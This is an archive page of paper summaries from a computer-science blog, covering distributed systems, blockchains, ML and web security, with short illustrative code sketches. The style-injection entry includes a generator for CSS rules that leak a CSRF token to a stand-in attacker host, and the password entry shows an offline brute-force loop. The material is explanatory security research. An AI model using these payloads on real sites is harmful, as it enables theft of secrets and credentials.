
Author Archives: adriancolyer

Service Fabric: a distributed platform for building microservices in the cloud

Service Fabric: a distributed platform for building microservices in the cloud Kakivaya et al., EuroSys’18

(If you don’t have ACM Digital Library access, the paper can be accessed by following the link above directly from The Morning Paper blog site).

Microsoft’s Service Fabric powers many of Azure’s critical services. It’s been in development for around 15 years, in production for 10, and was made available for external use in 2015.

Service Fabric (SF) enables application lifecycle management of scalable and reliable applications composed of microservices running at very high density on a shared pool of machines, from development to deployment to management.

Some interesting systems running on top of SF include:

  • Azure SQL DB (100K machines, 1.82M DBs containing 3.48PB of data)
  • Azure Cosmos DB (2 million cores and 100K machines)
  • Skype
  • Azure Event Hub
  • Intune
  • Azure IoT suite
  • Cortana

SF runs in multiple clusters each with 100s to many 1000s of machines, totalling over 160K machines with over 2.5M cores.

Positioning & Goals

Service Fabric defies easy categorisation, but the authors describe it as “Microsoft’s platform to support microservice applications in cloud settings.” What particularly makes it stand out from the crowd Continue reading

Hyperledger fabric: a distributed operating system for permissioned blockchains

Hyperledger fabric: a distributed operating system for permissioned blockchains Androulaki et al., EuroSys’18

(If you don’t have ACM Digital Library access, the paper can be accessed by following the link above directly from The Morning Paper blog site).

This very well written paper outlines the design of Hyperledger Fabric and the rationale for many of its key design decisions. It’s a great introduction and overview. Fabric is a permissioned blockchain system with the following key features:

  • A modular design allows many components to be pluggable, including the consensus algorithm
  • Instead of the order-execute architecture used by virtually all existing blockchain systems, Fabric uses an execute-order-validate paradigm which enables a combination of passive and active replication. (We’ll be getting into this in much more detail shortly).
  • Smart contracts can be written in any language.
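
To make the execute-order-validate idea concrete, here’s a toy sketch (my own illustration, not Fabric’s actual code) of the validation phase: transactions are executed speculatively against a snapshot, ordered, and then committed only if every key they read is still at the version they observed.

```python
# Hypothetical sketch of Fabric-style read-set validation. Names and data
# shapes are illustrative, not the real Fabric API: each transaction carries
# the key versions it read during simulation; stale reads are invalidated.

def validate_block(ledger_versions, ordered_txs):
    """ledger_versions: dict key -> version.
    ordered_txs: list of (read_set, write_set), where read_set maps
    key -> version observed at simulation time, write_set maps key -> value."""
    committed = []
    for read_set, write_set in ordered_txs:
        # Valid only if every key read is still at the observed version.
        if all(ledger_versions.get(k, 0) == v for k, v in read_set.items()):
            for k in write_set:
                ledger_versions[k] = ledger_versions.get(k, 0) + 1
            committed.append((read_set, write_set))
    return committed

# Two transactions both read key 'a' at version 1; after the first commits,
# the second's read is stale and it is invalidated.
versions = {"a": 1}
txs = [({"a": 1}, {"a": "x"}), ({"a": 1}, {"a": "y"})]
valid = validate_block(versions, txs)
```

This is the sense in which ordering and execution are decoupled: execution happens before consensus on order, and conflicts are resolved after ordering by this validation step.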

…in popular deployment configurations, Fabric achieves throughput of more than 3500 tps, achieving finality with latency of a few hundred ms and scaling well to over 100 peers.

Examples of use cases powered by Fabric include foreign exchange netting in which a blockchain is used to resolve trades that aren’t settling; enterprise asset management tracking hardware assets as they move from manufacturing to Continue reading

ForkBase: an efficient storage engine for blockchain and forkable applications

ForkBase: an efficient storage engine for blockchain and forkable applications Wang et al., arXiv’18

ForkBase is a data storage system designed to support applications that need a combination of data versioning, forking, and tamper proofing. The prime examples are blockchain systems, but collaborative applications such as Google Docs fit the bill too. Today, for example, Ethereum and Hyperledger Fabric build their data structures directly on top of a key-value store. ForkBase seeks to push these properties down into the storage layer instead:

One direct benefit is that it reduces development efforts for applications requiring any combination of these features. Another benefit is that it helps applications generalize better by providing additional features, such as efficient historical queries, at no extra cost. Finally, the storage engine can exploit performance optimization that is hard to achieve at the application layer.

Essentially what we end up with is a key-value store with native support for versioning, forking, and tamper evidence, built on top of an underlying object storage system. At the core of ForkBase is a novel index structure called a POS-Tree (pattern-oriented-split tree).
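
To give a flavour of what pattern-oriented splitting means, here’s a toy content-defined chunking sketch (my own illustration; the rolling hash and pattern are stand-ins for ForkBase’s actual scheme). Boundaries fall wherever the hash matches a pattern, so identical content always produces identical chunks, which is what makes deduplication across forks cheap.

```python
# Toy content-defined chunking: split where a rolling hash over the bytes
# matches a bit pattern. Hash function, mask, and minimum window are all
# illustrative parameters, not ForkBase's real choices.

def chunk(data, mask=0x3F, window=4):
    chunks, start, h = [], 0, 0
    for i, b in enumerate(data):
        h = ((h << 1) + b) & 0xFFFFFFFF      # toy rolling hash
        if i - start + 1 >= window and (h & mask) == mask:
            chunks.append(data[start:i + 1])  # boundary: pattern matched
            start, h = i + 1, 0
    if start < len(data):
        chunks.append(data[start:])
    return chunks

# Chunking is deterministic in the content, so repeated content yields
# repeated chunks, and deduplication reduces to a set-membership test
# over chunk digests.
a = chunk(b"the quick brown fox jumps over the lazy dog" * 4)
```

Reassembling the chunks always recovers the original byte string, so the index structure above this layer can reference chunks by digest without loss.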

The ForkBase stack

From the bottom-up, ForkBase comprises a chunk storage layer that performs chunking and deduplication, a Continue reading

zkLedger: privacy-preserving auditing for distributed ledgers

zkLedger: privacy-preserving auditing for distributed ledgers Narula et al., NSDI’18

Somewhat similarly to Solidus, which we looked at late last year, zkLedger (presumably standing for zero-knowledge ledger) provides transaction privacy for participants in a permissioned blockchain setting. zkLedger also has an extra trick up its sleeve: it provides rich and fully privacy-preserving auditing capabilities. Thus a number of financial institutions can collectively use a blockchain-based settlement ledger, and an auditor can measure properties such as financial leverage, asset illiquidity, counter-party risk exposures, and market concentration, either for the system as a whole, or for individual participants. It provides a cryptographically verified level of transparency that’s a step beyond anything we have today.

The goals of zkLedger are to hide the amounts, participants, and links between transactions while maintaining a verifiable transaction ledger, and for the Auditor to receive reliable answers to its queries. Specifically, zkLedger lets banks issue hidden transfer transactions which are still publicly verifiable by all other participants; every participant can confirm a transaction conserves assets and assets are only transferred with the spending bank’s authority.
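
The “publicly verifiable while hidden” property rests on additively homomorphic commitments. Here’s a toy Pedersen-style sketch (tiny, insecure parameters, purely for illustration) of the key algebraic fact an auditor relies on: the product of two commitments is a commitment to the sum of the hidden values.

```python
# Toy Pedersen-style commitment: Comm(v, r) = G^v * H^r mod P.
# The parameters below are far too small to be secure and the generators are
# not chosen properly; this only demonstrates the homomorphic property
# zkLedger-style auditing builds on.

P = 1_000_003          # small prime modulus (insecure toy parameter)
G, H = 2, 3            # toy generators; real schemes pick these carefully

def commit(value, blinding):
    return (pow(G, value, P) * pow(H, blinding, P)) % P

c1 = commit(40, 7)
c2 = commit(2, 11)
# Homomorphic property: multiplying commitments commits to the sum of the
# values (and the sum of the blinding factors), without revealing either.
product = (c1 * c2) % P
```

Because sums can be checked on commitments alone, participants can verify that a transfer conserves assets, and an auditor can verify aggregates over hidden amounts, without anyone opening the individual commitments.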

Setting the stage

A zkLedger system comprises n banks and an auditor that verifies certain operational aspects of transactions Continue reading

Towards a design philosophy for interoperable blockchain systems

Towards a design philosophy for interoperable blockchain systems Hardjono et al., arXiv 2018

Once upon a time there were networks and inter-networking, which let carefully managed groups of computers talk to each other. Then with a capital “I” came the Internet, with design principles that ultimately enabled devices all over the world to interoperate. Like many other people, I have often thought about the parallels between networks and blockchains, between the Internet, and something we might call ‘the Blockchain’ (capital ‘B’). In today’s paper choice, Hardjono et al. explore this relationship, seeing what we can learn from the design principles of the Internet, and what it might take to create an interoperable blockchain infrastructure. Some of these lessons are embodied in the MIT Tradecoin project.

We argue that if blockchain technology seeks to be a fundamental component of the future global distributed network of commerce and value, then its architecture must also satisfy the same fundamental goals of the Internet architecture.

The design philosophy of the Internet

This section of the paper is a précis of ‘The design philosophy of the DARPA Internet protocols’ from SIGCOMM 1988. The top three fundamental goals for the Internet as conceived Continue reading

Measuring the tendency of CNNs to learn surface statistical regularities

Measuring the tendency of CNNs to learn surface statistical regularities Jo et al., arXiv’17

With thanks to Cris Conde for bringing this paper to my attention.

We’ve looked at quite a few adversarial attacks on deep learning systems in previous editions of The Morning Paper. I find them fascinating for what they reveal about the current limits of our understanding.

…humans are able to correctly classify the adversarial image with relative ease, whereas the CNNs predict the wrong label, usually with very high confidence. The sensitivity of high performance CNNs to adversarial examples casts serious doubt that these networks are actually learning high level abstract concepts. This begs the following question: How can a network that is not learning high level abstract concepts manage to generalize so well?

In this paper, Jo and Bengio conduct a series of careful experiments to try and discover what’s going on. The initial hypothesis runs like this:

  • There are really only two ways we could be seeing the strong generalisation performance that we do. Either (a) the networks are learning high level concepts, or (b) there may be a number of superficial cues in images that are shared across training and test datasets, Continue reading
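
One way the paper probes hypothesis (b) is by constructing Fourier-filtered versions of the datasets: if a CNN’s predictions change sharply under perceptually mild spectral filtering, it is likely leaning on surface-level regularities. A minimal numpy sketch of that kind of filtering (my own illustration, with toy parameters):

```python
# Radial low-pass filtering in the Fourier domain: zero out frequency
# components beyond a given radius from the centre and reconstruct the image.
import numpy as np

def radial_low_pass(img, radius):
    """Keep only spatial frequencies within `radius` of the DC component."""
    f = np.fft.fftshift(np.fft.fft2(img))
    h, w = img.shape
    yy, xx = np.mgrid[:h, :w]
    dist = np.hypot(yy - h // 2, xx - w // 2)
    f[dist > radius] = 0
    return np.real(np.fft.ifft2(np.fft.ifftshift(f)))

rng = np.random.default_rng(0)
img = rng.random((32, 32))
filtered = radial_low_pass(img, radius=8)
```

Low-pass filtering preserves the DC component (the image mean) while discarding fine detail, which is exactly the kind of “same gist, different surface statistics” perturbation the experiments rely on.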

Large-scale analysis of style injection by relative path overwrite

Large-scale analysis of style injection by relative path overwrite Arshad et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

We’ve all been fairly well trained to have good awareness of cross-site scripting (XSS) attacks. Less obvious, and also less well known, is that a similar attack is possible using style sheet injection. A good name for these attacks might be SSS: same-site style attacks.

Even though style injection may appear less serious a threat than script injection, it has been shown that it enables a range of attacks, including secret exfiltration… Our work shows that around 9% of the sites in the Alexa top 10,000 contain at least one vulnerable page, out of which more than one third can be exploited.

I’m going to break today’s write-up down into four parts:

  1. How on earth do you do secret exfiltration with a stylesheet?
  2. Injecting stylesheet content using Relative Path Overwrite (RPO)
  3. Finding RPO vulnerabilities in the wild
  4. How can you defend against RPO attacks?

Secret exfiltration via stylesheets

Style sheet injection Continue reading
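
The attribute-selector trick at the heart of stylesheet exfiltration can be sketched as follows (Python generating the injected CSS; the field name and attacker URL are hypothetical): injected rules match successive prefixes of a secret attribute value, and whichever selector matches triggers a request to an attacker-observed URL for that prefix.

```python
# Generate one CSS rule per candidate next character of a secret (e.g. a CSRF
# token held in an input's value attribute). The [value^="..."] selector
# matches on a prefix; the matching rule's background URL leaks the prefix to
# the attacker's server. "csrf" and attacker.example are made-up names.

ALPHABET = "abcdef0123456789"

def exfil_rules(known_prefix, attacker_host="attacker.example"):
    rules = []
    for c in ALPHABET:
        guess = known_prefix + c
        rules.append(
            'input[name="csrf"][value^="%s"] '
            '{ background: url("https://%s/leak/%s"); }'
            % (guess, attacker_host, guess)
        )
    return "\n".join(rules)

css = exfil_rules("a3")
```

Repeating this character by character recovers the whole secret: each injected stylesheet extends the known prefix by one character, no JavaScript required.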

Unsupervised anomaly detection via variational auto-encoder for seasonal KPIs in web applications

Unsupervised anomaly detection via variational auto-encoder for seasonal KPIs in web applications Xu et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Today’s paper examines the problem of anomaly detection for web application KPIs (e.g. page views, number of orders), studied in the context of a ‘top global Internet company’ which we can reasonably assume to be Alibaba.

Among all KPIs, the most important ones are business-related KPIs, which are heavily influenced by user behaviour and schedule, and thus roughly have seasonal patterns occurring at regular intervals (e.g., daily and/or weekly). However, anomaly detection for these seasonal KPIs with various patterns and data quality has been a great challenge, especially without labels.

Donut is an unsupervised anomaly detection algorithm based on Variational Auto-Encoding (VAE). It uses three techniques (modified ELBO, missing data injection, and MCMC imputation), which together add up to state-of-the-art anomaly detection performance. One of the interesting findings in the research is that it is important to train on both normal data and abnormal data Continue reading

Algorithmic glass ceiling in social networks: the effects of social recommendations on network diversity

Algorithmic glass ceiling in social networks: the effects of social recommendations on network diversity Stoica et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Social networks were meant to connect us and bring us together. This paper shows that while they might be quite successful at doing this in the small, on a macro scale they’re actually doing the opposite. Not only do they reinforce and sustain disparities among groups, they actually accelerate the rate at which disparity grows. I.e., they’re driving us apart. This happens due to the rich-get-richer phenomenon resulting from friend/follow recommendation algorithms.

… we find that prominent social recommendation algorithms can exacerbate the under-representation of certain demographic groups at the top of the social hierarchy… Our mathematical analysis demonstrates the existence of an algorithmic glass ceiling that exhibits all the properties of the metaphorical social barrier that hinders groups like women or people of colour from attaining equal representation.

Organic growth vs algorithmic growth

In the social networks now governing the knowledge, Continue reading

Pixie: a system for recommending 3+ billion items to 200+ million users in real-time

Pixie: a system for recommending 3+ billion items to 200+ million users in real-time Eksombatchai et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Pinterest is a visual catalog with several billion pins, which are visual bookmarks containing a description, a link, and an image or a video. A major problem faced at Pinterest is to provide personalized, engaging, and timely recommendations from a pool of 3+ billion items to 200+ million monthly active users.

Stating the obvious, 3 billion or so items is a lot to draw recommendations from. This paper describes how Pinterest do it. One of the requirements is that recommendations need to be calculated in real-time on-demand. I’m used to thinking about the shift from batch to real-time in terms of improved business responsiveness, more up-to-date information, continuous processing, and so on. Pinterest give another really good reason which is obvious with hindsight, but hadn’t struck me before: when you compute recommendations using a batch process, you have to calculate the recommendations for every user Continue reading
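
The heart of Pixie is a random walk with restarts over the pin-board graph. A heavily simplified sketch (my own toy illustration; the real system adds per-user biasing, early stopping, and multi-pin queries):

```python
# Random walk with restart over a bipartite pin-board graph: alternate
# pin -> board -> pin hops, counting pin visits; restarts keep the walk in
# the neighbourhood of the query pin. The most-visited pins become candidate
# recommendations.
import random
from collections import Counter

def pixie_walk(pin_to_boards, board_to_pins, query_pin, steps=10_000,
               restart_prob=0.5, seed=0):
    rng = random.Random(seed)
    visits, pin = Counter(), query_pin
    for _ in range(steps):
        board = rng.choice(pin_to_boards[pin])
        pin = rng.choice(board_to_pins[board])
        visits[pin] += 1
        if rng.random() < restart_prob:
            pin = query_pin      # restart: stay local to the query pin
    return visits

# Tiny example graph: p2 shares a board with the query pin p1, p3 is one
# board further away, so p2 should be visited more often than p3.
p2b = {"p1": ["b1"], "p2": ["b1", "b2"], "p3": ["b2"]}
b2p = {"b1": ["p1", "p2"], "b2": ["p2", "p3"]}
visits = pixie_walk(p2b, b2p, "p1")
```

Because the walk only ever touches the neighbourhood of the query pin, the cost per request is tiny relative to the 3-billion-item graph, which is what makes on-demand, real-time recommendation feasible.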

SafeKeeper: protecting web passwords using trusted execution environments

SafeKeeper: protecting web passwords using trusted execution environments Krawiecka et al., WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Today’s paper is all about password management for password protected web sites / applications. Even if we assume that passwords are salted and hashed in accordance with best practice (NIST’s June 2017 digital identity guidelines now mandate the use of keyed one-way functions such as CMAC), an adversary that can obtain a copy of the back-end database containing the per-user salts and the hash values can still mount brute force guessing attacks against individual passwords.
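
A minimal sketch of why that’s true (illustrative only, and using a plain salted SHA-256 rather than the keyed CMAC best practice mandates): once the salt and hash leak, password guessing becomes an offline dictionary loop that no server-side rate limiting can touch.

```python
# Offline guessing against a leaked salted-hash record: the attacker hashes
# candidate passwords with the known salt until one matches. Real attacks use
# huge dictionaries, rules, and GPUs; the principle is the same.
import hashlib

def stored_record(password, salt):
    return hashlib.sha256(salt + password.encode()).hexdigest()

def brute_force(record, salt, candidates):
    for guess in candidates:
        if stored_record(guess, salt) == record:
            return guess
    return None

salt = b"\x01\x02\x03\x04"
leaked = stored_record("hunter2", salt)
recovered = brute_force(leaked, salt, ["123456", "password", "hunter2"])
```

SafeKeeper’s answer, as we’ll see, is to move the keyed hashing inside a trusted execution environment so that even an adversary holding the whole database cannot run this loop.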

SafeKeeper goes a lot further in its protection of passwords. What really stands out is the threat model. SafeKeeper keeps end user passwords safe even when we assume that an adversary has unrestricted access to the password database. Not only that, the adversary is able to modify the content sent to the user from the web site (including active content such as client-side scripts). And not only that! The adversary is also able to read all Continue reading

Semantics and complexity of GraphQL

Semantics and complexity of GraphQL Hartig & Pérez, WWW’18

(If you don’t have ACM Digital Library access, the paper can be accessed either by following the link above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

GraphQL has been gathering good momentum since Facebook open sourced it in 2015, so I was very interested to see this paper from Hartig and Pérez exploring its properties.

One of the main advantages (of GraphQL) is its ability to define precisely the data you want, replacing multiple REST requests with a single call…

One of the most interesting questions here is what if you make a public-facing GraphQL-based API (as e.g. GitHub have done), and then the data that people ask for happens to be very expensive to compute in space and time?

Here’s a simple GraphQL query to GitHub asking for the login names of the owners of the first two repositories where ‘danbri’ is an owner.
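
Reconstructed from that description, the query looks something like this (field names follow GitHub’s GraphQL schema as best I can tell; treat it as a sketch):

```graphql
query {
  user(login: "danbri") {
    repositories(first: 2) {
      nodes {
        owner {
          login
        }
      }
    }
  }
}
```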

From here there are two directions we can go in to expand the set of results returned: we can increase the breadth by asking for more repositories to be considered (i.e., changing first:2 Continue reading

Re-coding Black Mirror, Part V

This is the final part of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Towards trust-based decentralized ad-hoc social networks

Koidl argues that we have a ‘crisis of trust’ in social media, which manifests in filter bubbles, fake news, and echo chambers.

  • “Filter bubbles are the result of engagement-based content filtering. The underlying principle is to show the user content that relates to the content the user has previously engaged on. The result is a content stream that lacks diversification of topics and opinions.”
  • “Echo chambers are the result of content recommendations that are based on interests of friends and peers. This results in a content feed that is strongly biased towards grouped opinion (e.g. Group Think).”
  • “Fake news, and related expressions of the same, such as alternative facts, is Continue reading

Re-coding Black Mirror Part IV

This is part IV of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Is this the era of misinformation yet? Combining social bots and fake news to deceive the masses

In 2016, the world witnessed the storming of social media by social bots spreading fake news during the US Presidential elections… researchers collected Twitter data over four weeks preceding the final ballot to estimate the magnitude of this phenomenon. Their results showed that social bots were behind 15% of all accounts and produced roughly 19% of all tweets… What would happen if social media were to get so contaminated by fake news that trustworthy information hardly reaches us anymore?

Fake news and hoaxes have been Continue reading

Re-coding Black Mirror Part III

This is part III of our tour through the papers from the Re-coding Black Mirror workshop exploring future technology scenarios and their social and ethical implications.

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Shut up and run: the never-ending quest for social fitness

In this paper we explore possible negative drawbacks in the use of wearable sensors, i.e., wearable devices used to detect different kinds of activity, e.g., from step and calories counting to heart rate and sleep monitoring.

The core of the paper consists of three explored scenarios: Alice’s insurance, Bob’s mortgage, and Charlie’s problem.

Alice is looking to buy health insurance, which requires completing a screening process with potential insurers. Company A scanned Alice’s social media, found out that her mother has diabetes, adjusted risk upwards and hence offered a costly plan beyond what Alice can afford. Company Continue reading

Re-coding Black Mirror, Part II

We’ll be looking at a couple more papers from the re-coding Black Mirror workshop today:

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Pitfalls of affective computing

It’s possible to recognise emotions from a variety of signals including facial expressions, gestures and voices, using wearables or remote sensors, and so on.

In the current paper we envision a future in which such technologies perform with high accuracy and are widespread, so that people’s emotions can typically be seen by others.

Clearly, this could potentially reveal information people do not wish to reveal. Emotions can be leaked through facial micro-expressions and body language, making concealment very difficult. It could also weaken social skills if it is believed that there is no need to speak or move to convey emotions. “White lies” might become impossible, removing a person’s opportunity to be compassionate. It could also lead to physical harm:

The ability Continue reading

Re-coding Black Mirror, Part I

In looking through the WWW’18 proceedings, I came across the co-located ‘Re-coding Black Mirror’ workshop.

Re-coding Black Mirror is a full day workshop which explores how the widespread adoption of web technologies, principles and practices could lead to potential societal and ethical challenges as the ones depicted in Black Mirror‘s episodes, and how research related to those technologies could help minimise or even prevent the risks of those issues arising.

The workshop has ten short papers exploring either existing episodes or Black Mirror-esque scenarios in which technology can go astray. As food for thought, we’ll be looking at a selection of those papers this week. At the MIT Media Lab, Black Mirror episodes are assigned viewing for new graduate students in the Fluid Interfaces research group.

Today we’ll be looking at:

(If you don’t have ACM Digital Library access, all of the papers in this workshop can be accessed either by following the links above directly from The Morning Paper blog site, or from the WWW 2018 proceedings page).

Both papers pick Continue reading

Inaudible voice commands: the long-range attack and defense

Inaudible voice commands: the long-range attack and defense Roy et al., NSDI’18

Although you can’t hear them, I’m sure you heard about the inaudible ultrasound attacks on always-on voice-based systems such as Amazon Echo, Google Home, and Siri. This short video shows a ‘DolphinAttack’ in action:

To remain inaudible, the attack only works from close range (about 5ft). And it can work at up to about 10ft when partially audible. Things would get a whole lot more interesting if we could conduct inaudible attacks over a longer range. For example, getting all phones in a crowded area to start dialling your premium number, or targeting every device in an open plan office, or parking your car on the road and controlling all voice-enabled devices in the area. “Alexa, open my garage door…”. In today’s paper, Roy et al. show us how to significantly extend the range of inaudible voice command attacks. Their experiments are limited by the power of their amplifier, but succeed at up to 25ft (7.6m). Fortunately, the authors also demonstrate how we can construct software-only defences against the attacks.
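
The attack rests on amplitude-modulating the voice command onto an ultrasonic carrier and letting the nonlinearity of the microphone’s amplifier demodulate it back into the audible band. A numpy sketch of that effect (toy parameters; a square-law term stands in for the amplifier nonlinearity):

```python
# AM onto a 40 kHz carrier: the transmitted signal has no audible content,
# but squaring it (a stand-in for amplifier nonlinearity) recreates energy
# at the original command frequency. All parameters are illustrative.
import numpy as np

fs = 192_000                                   # sample rate covering ultrasound
t = np.arange(0, 0.01, 1 / fs)
command = np.sin(2 * np.pi * 400 * t)          # stand-in for a voice command
carrier = np.sin(2 * np.pi * 40_000 * t)
transmitted = (1 + command) * carrier          # AM signal, all above ~39 kHz

received = transmitted ** 2                    # square-law nonlinearity
spectrum = np.abs(np.fft.rfft(received))
freqs = np.fft.rfftfreq(len(received), 1 / fs)

# The strongest audible-band component of the "received" signal sits back at
# the command frequency, even though nothing audible was ever transmitted.
band = (freqs > 100) & (freqs < 20_000)
peak_hz = freqs[band][np.argmax(spectrum[band])]
```

Extending the range is then largely a matter of transmit power and speaker arrays, which is exactly where this paper pushes; the defences exploit tell-tale spectral artefacts of this demodulation.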

We test our attack prototype with 984 commands to Amazon Echo and 200 commands to smartphones Continue reading

Progressive growing of GANs for improved quality, stability, and variation

Progressive growing of GANs for improved quality, stability, and variation Karras et al., ICLR’18

Let’s play “spot the celebrity”! (Not your usual #themorningpaper fodder I know, but bear with me…)

In each row, one of these is a photo of a real person, the other image is entirely created by a GAN. But which is which?

The man on the left, and the woman on the right, are both figments of a computer’s imagination.

In today’s paper, Karras et al. demonstrate a technique for producing high-resolution (e.g. 1024×1024) realistic looking images using GANs:

The key idea is to grow both the generator and discriminator progressively: starting from a low resolution, we add new layers that model increasingly fine details as training progresses. This both speeds the training up and greatly stabilizes it, allowing us to produce images of unprecedented quality.
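
When a new resolution level is added, its output is faded in gradually: it is blended with a plain upsampling of the previous level while a weight alpha ramps from 0 to 1 over training. A toy numpy sketch of that blending (my own illustration of the idea, not the paper’s code):

```python
# Fade-in when growing a GAN to the next resolution: blend the new layer's
# output with a nearest-neighbour upsampling of the previous resolution.
import numpy as np

def upsample_nearest(x):
    """2x nearest-neighbour upsampling of an HxW image."""
    return x.repeat(2, axis=0).repeat(2, axis=1)

def faded_output(low_res, new_layer_out, alpha):
    """alpha=0: only the (upsampled) old pathway; alpha=1: only the new layer."""
    return (1 - alpha) * upsample_nearest(low_res) + alpha * new_layer_out

low = np.ones((4, 4))      # stand-in for the previous resolution's output
new = np.zeros((8, 8))     # stand-in for the freshly added layer's output
start = faded_output(low, new, 0.0)   # training right after growing
end = faded_output(low, new, 1.0)     # new layer fully phased in
```

The same fade-in is mirrored in the discriminator, so at no point does either network see a sudden change in its input distribution, which is where the stability gains come from.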

You can find all of the code, links to plenty of generated images, and videos of image interpolation here: https://github.com/tkarras/progressive_growing_of_gans. This six-minute results video really showcases the work in a way that it’s hard to describe without seeing. Well worth the time if this topic interests you.

Progression

Recall that in a GAN setup we pitch a Continue reading

Photo-realistic single image super-resolution using a generative adversarial network

Photo-realistic single image super-resolution using a generative adversarial network Ledig et al., arXiv’16

Today’s paper choice also addresses an image-to-image translation problem, but here we’re interested in one specific challenge: super-resolution. In super-resolution we take as input a low resolution image like this:

And produce as output an estimation of a higher-resolution up-scaled version:

For the example above, here’s the ground truth hi-resolution image from which the low-res input was initially generated:

Especially challenging of course, is to recover / generate realistic looking finer texture details when super-resolving at large upscaling factors. (Look at the detail around the hat band and neckline in the above figures for example).

In this paper, we present SRGAN, a generative adversarial network (GAN) for image super-resolution (SR). To our knowledge, it is the first framework capable of inferring photo-realistic natural images for 4x upscaling factors.

In a mean-opinion score test, the scores obtained by SRGAN are closer to those of the original high-resolution images than those obtained by any other state-of-the-art method.

Here’s an example of the fine-detail SRGAN can create, even when upscaling by a factor of 4. Note how close it is to the original.

Your Loss is my GA(i)N

A Continue reading